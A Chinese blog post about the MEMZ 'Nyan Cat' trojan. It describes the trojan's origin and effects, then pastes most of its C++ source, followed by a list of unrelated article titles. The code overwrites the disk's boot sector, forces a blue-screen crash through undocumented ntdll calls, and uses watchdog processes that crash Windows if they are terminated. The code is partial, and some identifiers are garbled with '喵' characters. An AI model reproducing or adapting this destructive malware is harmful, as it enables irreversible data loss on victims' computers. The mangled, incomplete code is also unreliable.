一、描述

彩虹猫病毒,又称MEMZ,是作者Leurak2016年编写的特洛伊木马,来源于德国,主要由C++汇编这两种编程语言编写的, 源文件的扩展名一般为.exe.bat

MEMZ是一种能运行于微软Windows操作系统的木马。它最初诞生是源于Danooct1的“观赏性恶意软件”系列。该木马拥有好几个感染阶段,并且全部阶段都由其他阶段自动触发,某些会延迟执行。 它能以.exe文件方式和批处理文件去运行。其中批处理版本的运行方式类似于压缩文件的自解压,然后运行解压出来的.exe文件。

二、效果

根据Leurak所描述,它的过程有:

  • 打开一个标题为“note”的txt文本文档,里面是英文“YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN. Your computer won't boot up again, so use it as long as you can! :D Trying to kill MEMZ will cause your system to be destroyed instantly, so don't try it :D ”
  • 随机打开(搜索)网页、应用程序
  • 鼠标指针的移动
  • 随机键盘输入
  • 错误的提示声效(依据操作系统而改变)
  • 颜色反转
  • 弹出消息框
  • 绘制错误图标
  • 大部分的文字会被反转(在Windows XP下开始按钮的文字也会被反转)
  • 对整个屏幕进行截屏(“隧道效果”)
  • 出现屏幕失灵的现象
  • MBR分区被重写。分区表也可能被破坏

其他感染阶段(后面版本才增加的)

  • 随机的芯片音乐
  • 随机屏幕错位

三、源代码(最好不要运行,我没有试)

int scrw, scrh;#ifdef CLEAN
HWND mainWindow; // In the main window, in the main window, in the main window, ...
HFONT font;
HWND dialog;
#endifvoid main() {scrw = GetSystemMetrics(SM_CXSCREEN);scrh = GetSystemMetrics(SM_CYSCREEN);#ifndef CLEANint argc;LPWSTR *argv = CommandLineToArgvW(GetCommandLineW(), &argc);if (argc > 1) {if (!lstrcmpW(argv[1], L"/watchdog")) {CreateThread(NULL, NULL, &watchdogThread, NULL, NULL, NULL);WNDCLASSEXA c;c.cbSize = sizeof(WNDCLASSEXA);c.lpfnWndProc = WindowProc;c.lpszClassName = "hax";c.style = 0;c.cbClsExtra = 0;c.cbWndExtra = 0;c.hInstance = NULL;c.hIcon = 0;c.hCursor = 0;c.hbrBackground = 0;c.lpszMenuName = NULL;c.hIconSm = 0;RegisterClassExA(&c);HWND hwnd = CreateWindowExA(0, "hax", NULL, NULL, 0, 0, 100, 100, NULL, NULL, NULL, NULL);MSG msg;while (GetMessage(&msg, NULL, 0, 0) > 0) {TranslateMessage(&msg);DispatchMessage(&msg);}}} else {// Another very ugly formattingif (MessageBoxA(NULL, "The software you just executed is considered malware.\r\n\
This malware will harm your computer and makes it unusable.\r\n\
If you are seeing this message without knowing what you just executed, simply press No and nothing will happen.\r\n\
If you know what this malware does and are using a safe environment to test, \
press Yes to start it.\r\n\r\n\
DO YOU WANT TO EXECUTE THIS MALWARE, RESULTING IN AN UNUSABLE MACHINE?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES ||
MessageBoxA(NULL, "THIS IS THE LAST WARNING!\r\n\r\n\
THE CREATOR IS NOT RESPONSIBLE FOR ANY DAMAGE MADE USING THIS MALWARE!\r\n\
STILL EXECUTE IT?", "MEMZ", MB_YESNO | MB_ICONWARNING) != IDYES) {ExitProcess(0);}wchar_t *fn = (wchar_t *)LocalAlloc(LMEM_ZEROINIT, 8192*2);GetModuleFileName(NULL, fn, 8192);for (int i = 0; i < 5; i++)ShellExecute(NULL, NULL, fn, L"/watchdog", NULL, SW_SHOWDEFAULT);SHELLEXECUTEINFO info;info.cbSize = sizeof(SHELLEXECUTEINFO);info.lpFile = fn;info.lpParameters = L"/main";info.fMask = SEE_MASK_NOCLOSEPROCESS;info.hwnd = NULL;info.lpVerb = NULL;info.lpDirectory = NULL;info.hInstApp = NULL;info.nShow = SW_SHOWDEFAULT;ShellExecuteEx(&info);SetPriorityClass(info.hProcess, HIGH_PRIORITY_CLASS);ExitProcess(0);}HANDLE drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);if (drive == INVALID_HANDLE_VALUE)ExitProcess(2);unsigned char *bootcode = (unsigned char *)LocalAlloc(LMEM_ZEROINIT, 65536);// Join the two code parts togetherint i = 0;for (; i < code1_len; i++)*(bootcode + i) = *(code1 + i);for (i = 0; i < code2_len; i++)*(bootcode + i + 0x1fe) = *(code2 + i);DWORD wb;if (!WriteFile(drive, bootcode, 65536, &wb, NULL))ExitProcess(3);CloseHandle(drive);HANDLE note = CreateFileA("\\note.txt", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);if (note == INVALID_HANDLE_VALUE)ExitProcess(4);if (!WriteFile(note, msg, msg_len, &wb, NULL))ExitProcess(5);CloseHandle(note);ShellExecuteA(NULL, NULL, "notepad", "\\note.txt", NULL, SW_SHOWDEFAULT);for (int p = 0; p < nPayloads; p++) {Sleep(payloads[p].delay);CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);}for (;;) {Sleep(10000);}#else // CLEANInitCommonControls();dialog = NULL;LOGFONT lf;GetObject(GetStockObject(DEFAULT_GUI_FONT), sizeof(LOGFONT), &lf);font = CreateFont(lf.lfHeight, lf.lfWidth,lf.lfEscapement, lf.lfOrientation, lf.lfWeight,lf.lfItalic, lf.lfUnderline, lf.lfStrikeOut, lf.lfCharSet,lf.lfOutPrecision, lf.lfClipPrecision, lf.lfQuality,lf.lfPitchAndFamily, lf.lfFaceName);WNDCLASSEX c;c.cbSize = sizeof(WNDCLASSEX);c.lpfnWndProc = WindowProc;c.lpszClassName = L"MEMZPanel";c.style = CS_HREDRAW | CS_VREDRAW;c.cbClsExtra = 0;c.cbWndExtra = 0;c.hInstance = NULL;c.hIcon = 0;c.hCursor = 0;c.hbrBackground = (HBRUSH)(COLOR_3DFACE+1);c.lpszMenuName = NULL;c.hIconSm = 0;RegisterClassEx(&c);RECT rect;rect.left = 0;rect.right = WINDOWWIDTH;rect.top = 0;rect.bottom = WINDOWHEIGHT;AdjustWindowRect(&rect, WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, FALSE);mainWindow = CreateWindowEx(0, L"MEMZPanel", L"MEMZ Clean Version - Payload Panel", WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX,50, 50, rect.right-rect.left, rect.bottom-rect.top, NULL, NULL, GetModuleHandle(NULL), NULL);for (int p = 0; p < nPayloads; p++) {payloads[p].btn = CreateWindowW(L"BUTTON", payloads[p].name, (p==0?WS_GROUP:0) | WS_VISIBLE | WS_CHILD | WS_TABSTOP | BS_PUSHLIKE | BS_AUTOCHECKBOX | BS_NOTIFY,(p%COLUMNS)*喵NWIDTH+SPACE*(p%COLUMNS+1), (p/COLUMNS)*喵NHEIGHT + SPACE*(p/COLUMNS+1), 喵NWIDTH, 喵NHEIGHT,mainWindow, NULL, (HINSTANCE)GetWindowLong(mainWindow, GWL_HINSTANCE), NULL);SendMessage(payloads[p].btn, WM_SETFONT, (WPARAM)font, TRUE);CreateThread(NULL, NULL, &payloadThread, &payloads[p], NULL, NULL);}SendMessage(mainWindow, WM_SETFONT, (WPARAM)font, TRUE);ShowWindow(mainWindow, SW_SHOW);UpdateWindow(mainWindow);CreateThread(NULL, NULL, &keyboardThread, NULL, NULL, NULL);MSG msg;while (GetMessage(&msg, NULL, 0, 0) > 0) {if (dialog == NULL || !IsDialogMessage(dialog, &msg)) {TranslateMessage(&msg);DispatchMessage(&msg);}}
#endif
}#ifndef CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {if (msg == WM_CLOSE || msg == WM_ENDSESSION) {killWindows();return 0;}return DefWindowProc(hwnd, msg, wParam, lParam);
}DWORD WINAPI watchdogThread(LPVOID parameter) {int oproc = 0;char *fn = (char *)LocalAlloc(LMEM_ZEROINIT, 512);GetProcessImageFileNameA(GetCurrentProcess(), fn, 512);Sleep(1000);for (;;) {HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);PROCESSENTRY32 proc;proc.dwSize = sizeof(proc);Process32First(snapshot, &proc);int nproc = 0;do {HANDLE hProc = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, proc.th32ProcessID);char *fn2 = (char *)LocalAlloc(LMEM_ZEROINIT, 512);GetProcessImageFileNameA(hProc, fn2, 512);if (!lstrcmpA(fn, fn2)) {nproc++;}CloseHandle(hProc);LocalFree(fn2);} while (Process32Next(snapshot, &proc));CloseHandle(snapshot);if (nproc < oproc) {killWindows();}oproc = nproc;Sleep(10);}
}void killWindows() {// Show cool MessageBoxesfor (int i = 0; i < 20; i++) {CreateThread(NULL, 4096, &ripMessageThread, NULL, NULL, NULL);Sleep(100);}killWindowsInstant();
}void killWindowsInstant() {// Try to force BSOD first// I like how this method even works in user mode without admin privileges on all Windows versions since XP (or 2000, idk)...// This isn't even an exploit, it's just an undocumented feature.HMODULE ntdll = LoadLibraryA("ntdll");FARPROC RtlAdjustPrivilege = GetProcAddress(ntdll, "RtlAdjustPrivilege");FARPROC NtRaiseHardError = GetProcAddress(ntdll, "NtRaiseHardError");if (RtlAdjustPrivilege != NULL && NtRaiseHardError != NULL) {BOOLEAN tmp1; DWORD tmp2;((void(*)(DWORD, DWORD, BOOLEAN, LPBYTE))RtlAdjustPrivilege)(19, 1, 0, &tmp1);((void(*)(DWORD, DWORD, DWORD, DWORD, DWORD, LPDWORD))NtRaiseHardError)(0xc0000022, 0, 0, 0, 6, &tmp2);}// If the computer is still running, do it the normal wayHANDLE token;TOKEN_PRIVILEGES privileges;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &token);LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &privileges.Privileges[0].Luid);privileges.PrivilegeCount = 1;privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;AdjustTokenPrivileges(token, FALSE, &privileges, 0, (PTOKEN_PRIVILEGES)NULL, 0);// The actual restartExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_HARDWARE | SHTDN_REASON_MINOR_DISK);
}DWORD WINAPI ripMessageThread(LPVOID parameter) {HHOOK hook = SetWindowsHookEx(WH_C喵, msgBoxHook, 0, GetCurrentThreadId());MessageBoxA(NULL, (LPCSTR)msgs[random() % nMsgs], "MEMZ", MB_OK | MB_SYSTEMMODAL | MB_ICONHAND);UnhookWindowsHookEx(hook);return 0;
}
#else // CLEAN
LRESULT CALLBACK WindowProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {PAINTSTRUCT ps;HDC hdc;if (msg == WM_ACTIVATE) {if (wParam == NULL)dialog = NULL;elsedialog = hwnd;} else if (msg == WM_DESTROY) {ExitProcess(0);} else if (msg == WM_COMMAND) {if (wParam == BN_CLICKED && SendMessage((HWND)lParam, BM_GETCHECK, 0, NULL) == BST_CHECKED) {for (int p = 0; p < nPayloads; p++) {if (payloads[p].btn == (HWND)lParam && !payloads[p].safe) {SendMessage((HWND)lParam, BM_SETCHECK, BST_UNCHECKED, NULL);// Most ugly formatting EVERif (MessageBoxA(hwnd,"This payload is considered semi-harmful.\r\nThis means, it should be safe to use, but can still cause data loss or other things you might not want.\r\n\r\n\
If you have productive data on your system or signed in to online accounts, it is recommended to run this payload inside a \
virtual machine in order to prevent potential data loss or changed things you might not want.\r\n\r\n\
Do you still want to enable it?",
"MEMZ", MB_YESNO | MB_ICONWARNING) == IDYES) {SendMessage((HWND)lParam, BM_SETCHECK, BST_CHECKED, NULL);}}}}} else if (msg == WM_PAINT) {hdc = BeginPaint(hwnd, &ps);SelectObject(hdc, font);LPWSTR str;LPWSTR state = enablePayloads ? L"ENABLED" : L"DISABLED";FormatMessage(FORMAT_MESSAGE_FROM_STRING | FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_ARGUMENT_ARRAY,L"Payloads are currently %1. Press SHIFT+ESC to toggle all payloads!", 0, 0, (LPWSTR)&str, 1024, (va_list*)&state);TextOut(hdc, 10, WINDOWHEIGHT - 36, str, lstrlen(str));TextOut(hdc, 10, WINDOWHEIGHT - 20, L"Press CTRL+SHIFT+S to skip some time (makes some payloads faster)", 65);EndPaint(hwnd, &ps);} else {return DefWindowProc(hwnd, msg, wParam, lParam);}return 0;
}DWORD WINAPI keyboardThread(LPVOID lParam) {for (;;) {if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {enablePayloads = !enablePayloads;if (!enablePayloads) {RECT rect;HWND desktop = GetDesktopWindow();GetWindowRect(desktop, &rect);RedrawWindow(NULL, NULL, NULL, RDW_ERASE | RDW_INVALIDATE | RDW_ALLCHILDREN);EnumWindows(&CleanWindowsProc, NULL);} else {RedrawWindow(mainWindow, NULL, NULL, RDW_INVALIDATE | RDW_ERASE);}while ((GetKeyState(VK_SHIFT) & GetKeyState(VK_ESCAPE)) & 0x8000) {Sleep(100);}} else if ((GetKeyState(VK_SHIFT) & GetKeyState(VK_CONTROL) & GetKeyState('S')) & 0x8000) {if (enablePayloads) {for (int p = 0; p < nPayloads; p++) {if (SendMessage(payloads[p].btn, BM_GETCHECK, 0, NULL) == BST_CHECKED) {payloads[p].delay = payloads[p].payloadFunction(payloads[p].times++, payloads[p].runtime += payloads[p].delay, TRUE);}}}}Sleep(10);}return 0;
}BOOL CALLBACK CleanWindowsProc(HWND hwnd, LPARAM lParam) {DWORD pid;if (GetWindowThreadProcessId(hwnd, &pid) && pid == GetCurrentProcessId() && hwnd != mainWindow) {SendMessage(hwnd, WM_CLOSE, 0, 0);}return TRUE;
}
#endif

MEMZ彩虹猫病毒讲解相关推荐

  1. linux命令行怎么播放,如何在在 Linux 命令行中观看彩虹猫

    导读 在本系列文章中,我们将会探索一些娱乐用途(甚至有时完全没用)的 Linux 命令行小玩具.所有我们介绍的小玩具都是开源的. 你甚至可以在终端里欣赏彩虹猫. 也许你会问,它们都很独特吗?是的.不过 ...

  2. 打印一只Nyan Cat(彩虹猫)(C++)3.0[多色版]

    前面我们打印的都是一种颜色的彩虹猫,不太好看,那我们就打印一只五颜六色的彩虹猫吧 #include<bits/stdc++.h> #include "stdio.h" ...

  3. spacemacs使用彩虹猫

    在dotspacemacs-configuration-layers里面新增所需layer ;;Nyan Cat 彩虹猫,用于显示文件进度 (colors :variables colors-enab ...

  4. emacs如何配置彩虹猫模式

    emacs如何配置彩虹猫(Nyan cat-mode)模式? 什么是Nyan Cat,你看了这幅图就知道了: [注:在markdown模式下C-c C-i i是插入图片的快捷键] 好吧,重点来了,我们 ...

  5. linux运行彩虹猫,在 Linux 命令行中观看彩虹猫来稍事休息

    译者: Hansong Zhang 你并且可以在终端里欣赏彩虹猫. 今天是<Linux 命令行小玩具介绍>的第六天.在本系列文章中,我们将要探求一些娱乐用途(甚至有时完全没用)的 Linu ...

  6. 查看tom猫进程linux,分享|在 Linux 命令行中观看彩虹猫来稍事休息

    你甚至可以在终端里欣赏彩虹猫. 今天是<Linux 命令行小玩具介绍>的第六天.在本系列文章中,我们将会探索一些娱乐用途(甚至有时完全没用)的 Linux 命令行小玩具.所有我们介绍的小玩 ...

  7. Emacs nyan cat mode~ 彩虹猫mode配置

    Oh my god~今天在Emacs /Vim 资深群里发现了有位友人的Emacs的mode-line有这只萌猫的存在,不禁请教了下这只猫的姓名 原来它叫Nyan Cat google了一下: Nya ...

  8. nepctf Nyan Cat 彩虹猫

    考察点 32系统调用 布置栈 注意题目源文件没有告诉函数名是write啥的,这些都是我自己改的名字,开启了什么保护就自己看咯 思路概要 利用程序自带的系统调用使eax=0xb(execve函数系统调用 ...

  9. Touch Bar上的彩虹猫 - Touch Bar Nyan Cat

    彩虹猫Nyan Cat是英文世界中最著名的meme之一,其源视频在油管播放量已经超过了1.5亿次,衍生作品更是数不胜数.Touch Bar Nyan Cat就将彩虹猫动画搬到了 Touch Bar 上 ...

最新文章

  1. 上海实验学校计算机等级考试,全国和上海的计算机等级考试一级内容差别?
  2. python3 os模块
  3. 我们该如何学习机器学习中的数学
  4. android pss内存,如何释放android系统中pss cache住的内存
  5. nginx mysql双机热备_MYSQL双机热备
  6. PHPCMS v9里面,推荐位ID【posid】的值是如何确定的?是自定义的还是官方定义好的?...
  7. H3C SecPath U200-S 如何在内网使用外网IP地址访问内网服务器
  8. 【数据科学】什么是数据科学?
  9. android 头像存储,安卓裁剪上传保存头像
  10. RabbitMQ,Elasticsearch学习,批量读取消息队列上的数据上传到Elasticsearch
  11. python单例模式和装饰器
  12. 2021-06-28操作表单
  13. Elasticsearch核心知识点大全
  14. 二流学校的计算机博士,二流大学-复旦大学计算机科学技术学院博士生刘鹏飞荣获2016年度百度奖学金...
  15. 【jieba获取关键词】
  16. umijs介绍及基本用法、配置式路由、约定式路由、路由传参等
  17. 上市 | 章泽天 : 刘强东用10秒钟时间决定投资这个汽车
  18. 星巴克猫爪杯开售遭哄抢 淘宝同款比比皆是真假难辨
  19. uni-app监听窗口尺寸变化事件和隐藏键盘
  20. android annotations

热门文章

  1. Security+知识点
  2. jiffies和jiffies_64
  3. Android性能优化系列之电量优化
  4. git pull fatal: refusing to merge unrelated histories
  5. windows 查找目录下文件中包含某个字符串
  6. Python爬虫11-Scrapy爬虫框架
  7. 在指定数据的前面加“0“
  8. 普通打印机如何在A4纸上打印不同内容的标签
  9. MySQL入门学习之——MySQL Cluster初体验
  10. hcie培训价格多少钱?